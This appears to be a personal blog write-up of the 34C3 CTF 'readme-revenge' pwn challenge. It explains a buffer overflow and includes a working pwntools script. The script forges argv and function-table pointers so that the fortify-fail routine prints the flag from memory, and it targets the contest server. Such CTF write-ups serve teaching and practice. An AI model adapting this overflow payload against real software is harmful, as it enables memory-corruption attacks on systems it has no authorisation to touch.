34C3 CTF Pwn Readme-revenge Write-up

Introduction

I fail to solve this challenge during the contest. There is a simple buffer overflow vulnerability in this challenge and trigger control flow hijacking. But I spent a lot of time searching for ROP gadgets in the binary. After reading [1], I know I am too naive.

Vulnerability Analysis

There is a buffer overflow vulnerability in the challenge. After inputting a long sequence of “A” and some testing, we can get a crash at following site.
20171230002

Exploitation Plan

From the analysis above, I know that I can hijack control flow now. But I focus on searching ROP gadgets to pwn a shell failing to consider other possibilities.
The flag is actually located at 0x6b4040. Therefore we just need to print the string located at 0x6b4040.
After searching through the other global values that can be overwritten, we can use the fortify_fail function to do this via forging a argv variable in memory.
20171230001

Exploitation

from pwn import *
DEBUG = int(sys.argv[1]);

if(DEBUG == 0):
    r = remote("35.198.130.245", 1337);
elif(DEBUG == 1):
    r = process("./readme");
elif(DEBUG == 2):
    r = process("./readme");
    gdb.attach(r, '''source script''');

def halt():
    while(True):
        log.info(r.recvline());


fortifyFail = 0x4359e0;
flagAddr = 0x6b4040;
fakeArgc = 1; # 0x6b7978
fakeArgv = 0x6b7a10; #0x6b7980
fakeFunctionTable = 0x434343434343;
fakeArginfoTable = 0x6b7a20 - 0x73*8;
fortifyFailAddr = 0x4359d0;


def exploit():
    payload = p64(0x424242424242)*179;
    payload = payload + p64(fakeArgc) + p64(fakeArgv);
    
    payload = payload + p64(0)*17 + p64(flagAddr) + p64(0)
    payload = payload + p64(fortifyFailAddr) + p64(fakeFunctionTable);
    payload = payload + p64(0)*15 + p64(fakeArginfoTable);
    r.sendline(payload);
    halt();

exploit();

Conclusion

It’s a good lesson for CTF challenges. CTF pwn is not just about heap exploitation and pwning a shell. When entering into a dead end, try to consider other possibilities.

Reference

[1] https://gist.github.com/romanking98/8d0bb360a9563694d1d71f6a8cce3c3f

Advertisements

One thought on “34C3 CTF Pwn Readme-revenge Write-up

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

w

Connecting to %s